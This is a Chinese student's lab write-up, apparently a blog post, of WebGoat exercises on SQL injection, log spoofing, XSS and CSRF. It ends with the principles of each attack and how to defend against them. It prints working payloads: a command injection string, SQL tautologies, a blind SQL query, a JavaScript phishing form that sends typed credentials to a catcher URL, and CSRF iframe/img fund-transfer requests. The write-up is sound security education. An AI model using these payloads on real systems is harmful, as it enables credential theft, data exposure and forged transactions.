Exp9 Web安全基础

一、实践目标

       理解常用网络攻击技术的基本原理,包括(SQL,XSS,CSRF);

       在Webgoat实践下相关实验。

二、实践过程

准备工作:

       1.环境配置:

  下好jar包然后放在根目录下

  使用命令 java -jar webgoat-container-7.0.1-war-exec.jar 就可以解压运行webgoat了

 

       等待一会儿他解压,随后发现他底端出现

 

       说明已经可以登录网页开始使用webgoat

  2.使用webgoat:

  打开Firefox,输入 http://127.0.0.1:8080/WebGoat/login.mvc ,访问webgoat。

  使用默认账号和密码登录即可,

  发现左边目录只有8个选项·········

      

       在网上搜了一下,

      

       没找到啥有用的方法···

       

  最后在李师傅的帮助下,使用如下方法解决,

       

      成了!

   

 

 (一)SQL注入攻击

   1.命令注入(Command Injection)

     目标:能够在目标主机上执行系统命令

 (1)右键网页,点击 inspect Element ,查看并编辑网页源代码,查找 BasicAuthentication.help ,在旁边加上 "& netstat -an & ipconfig" 

(2)点击网页中的 view 按钮,就能在网页下面看到系统的网络连接情况了

   2.数字型SQL注入(Numeric SQL Injection)

   目标:注入一条SQL字符串,以显示所有显示的天气数据

  (1)右键网页,点击 inspect Element ,查看并编辑网页源代码,查找 New York ,在 option value 中加入恒等真式 or 1=1 

  (2)点击 go 就可以看到所有的天气数据了

   3.日志欺骗(Log Spoofing)

      目标:通过在日志文件中添加一个脚本像用户名“admin”成功登录

    (1)在 user name 中输入 gly%0d%0aLogin Succeeded for username: admin(密码随意)

      

   (2)点击 login in ,可以看到成功

     

   4.字符串SQL注入(String SQL Injection)

      目标:作为Smith,注入一个SQL字符串,显示所有信用卡号

   (1)输入永真式 ' or '1'='1 

   (2)点击 Go! ,就可以查看所有信用卡号了

 

   5.字符串SQL注入(String SQL Injection)

      目标:使用SQL注入作为老板(“Neville”)登录,并使用所有功能

 (1)第一次登录,在 password 中输入永真式,发现失败了,经过查看源代码,找到原因为:password最大长度不够,于是在源代码中修改最大长度

(2)输入永真式 ' or 1=1 -- ,登录成功,

 

   6.盲数字SQL注入(Blind Numeric SQL Injection)

      目标:在表格中找到字段pin的值

 (1)判断pin的值是否大于2500,

         使用命令 101 AND ((SELECT pin FROM pins WHERE cc_number='1111222233334444') > 2500); 

         发现无效,于是推断pin的值小于等于2500

 (2)使用二分法进行反复猜测,最终找到pin的值为2364

 

(二)XSS攻击

   1.网络钓鱼和XSS(Phishing with XSS)

    目标:使用XSS和HTML插入,将html插入到该请求凭证中,添加javascript来实际收集凭证

 (1)在 search 框中输入写好的html代码,代码如下:

</form>
<script>
function hack(){ 
XSSImage=new Image;
XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value + "";
alert("Had this been a real attack... Your credentials were just stolen. User Name = " + document.phish.user.value + " Password = " + document.phish.pass.value);
} 
</script>
<form name="phish">
<br><br>
<HR>
<H2>This feature requires account login:</H2>
<br>
<br>Enter Username:<br>
<input type="text" name="user">
<br>Enter Password:<br>
<input type="password" name = "pass">
<br>
<input type="submit" name="login" value="login" onclick="hack()">
</form>
<br>
<br>
<HR>

(2)点击 search 后,下拉网页就可以看到输入框,在里面输入任意字符,点击 login ,就可以看到攻击成功了

 

   2.存储的跨站点脚本(XSS)攻击(Stored XSS)

      目标:在搜索人员页面上使用一个漏洞来创建包含反射XSS攻击的URL。确认另一个使用该链接的员工受到攻击的影响。

 (1)如下图所示输入,

 

(2)提交后,再次点击刚刚创建的帖子,成功弹出窗口,说明攻击成功

    

   3.执行反射的XSS攻击(Reflected XSS)

      目标:执行反射XSS攻击,在搜索人员页面上使用一个漏洞来创建包含反射XSS攻击的URL。确认另一个使用该链接的员工受到攻击的影响

 (1)在搜索框中输入代码 <script>alert('gly');</script> 后,点击 purchase

 (2)弹出窗口,攻击成功

    

(三)CSRF攻击

   1.跨站请求伪造(CSRF)

      目标:给新闻组发邮件。电子邮件包含一个URL指向恶意请求的图像。在这节课中,URL应该指向“攻击”servlet,其中包含了“屏幕”和“菜单”参数,以及一          个额外的参数“transferFunds”,它具有任意的数值

(1)查看自己电脑的Screen和menu的值

         

(2)Title 中任意输入,在 Message 中输入代码,点击 Submit 后,点击下方的链接,就可以看到攻击成功了。代码如下,

<iframe src="http://localhost:8080/WebGoat/attack?Screen=309&menu=900&transferFunds=5000" width="1" height="1"/>

   

   2.CSRF Prompt By-Pass

      目标:输入代码,第一个为转帐的请求,第二个请求确认第一个请求触发的提示

 (1)查看自己电脑的Screen和menu的值

         

(2)Title 中任意输入,在 Message 中输入代码,点击 Submit 后,点击下方的链接,就可以看到攻击成功了。代码如下,

<img src="attack?Screen=291&menu=900&transferFunds=6000" WIDTH="1" HEIGHT="1">
<img src="attack?Screen=291&menu=900&transferFunds=confirm" WIDTH="1" HEIGHT="1">

 

三、实验后回答问题

      1.SQL注入攻击原理,如何防御

         攻击原理:SQL注入即是指web应用程序对用户输入数据的合法性没有判断,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。注射式攻击                                 的根源在于,程序命令和用户数据(即用户输入)之间没有做到泾渭分明。这使得攻击者有机会将程序命令当作用户输入的数据提交给We程序,以发号施令,为所欲为。

         防御方法:

  (1)普通用户与系统管理员用户的权限进行严格的区分;

  (2)不使用动态拼装sql,可以使用参数化的sql或者直接使用存储过程进行数据查询存取;

  (3)加强对用户输入的验证;

  (4)多多使用SQL Server数据库自带的安全参数;

  (5)必要的情况下使用专业的漏洞扫描工具来寻找可能被攻击的点。

 

     2.XSS攻击的原理,如何防御

        攻击原理:在编写代码的时候,没有对用户输入数据的合法性进行判断,攻击者通过对网页注入可执行代码且成功地被浏览器执行,这些代码包括HTML代码和客户端脚本,达到攻击的目的,形成了一次有效XSS攻击

        防御方法:

  (1)在表单提交或者url参数传递前,对需要的参数进行过滤;

  (2)检查用户输入的内容中是否有非法内容。如<>(尖括号)、”(引号)、 ‘(单引号)、%(百分比符号)、;(分号)、()(括号)、&(& 符号)、+(加号)等;

  (3)检查输出,严格控制输出.

 

    3.CSRF攻击原理,如何防御

       攻击原理:是一种对网站的恶意利用也就是人们所知道的钓鱼网站,XSS利用站点内的信任用户,而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站,是一种依赖web浏览器的、被混淆过的代理人攻击

       防御方法:

  (1)在form中包含秘密信息、用户指定的代号作为cookie之外的验证;

  (2)验证 HTTP Referer 字段,根据 HTTP 协议,在 HTTP 头中有一个字段叫 Referer,它记录了该 HTTP 请求的来源地址。网站只需要对于每一个转账请求验证其 Referer 值,如果是以 bank.example 开头的域名,则说明该请求是来自银行网站自己的请求,是合法的。如果 Referer 是其他网站的话,则有可能是黑客的 CSRF 攻击,拒绝该请求;

  (3)在请求地址中添加 token 并验证,可以在 HTTP 请求中以参数的形式加入一个随机产生的 token,并在服务器端建立一个拦截器来验证这个 token,如果请求中没有 token 或者 token 内容不正确,则认为可能是 CSRF 攻击而拒绝该请求。

四、实践体会

        这是最后一次实验了,通过webgoat深入理解并运用了多种攻击,尝试了很多东西,这九次实验,可以说是非常有意思了(除了调试环境、调试bug),收获良多,虽然不能成功攻击他人,但是能够认识并且做出相应的防范了。学习到了不少的东西,也进行了多次的实践与尝试。

       感谢老师的讲课!感谢各位同学帮助!

posted @ 2019-05-25 16:33  FourICes  阅读(93)  评论(0编辑  收藏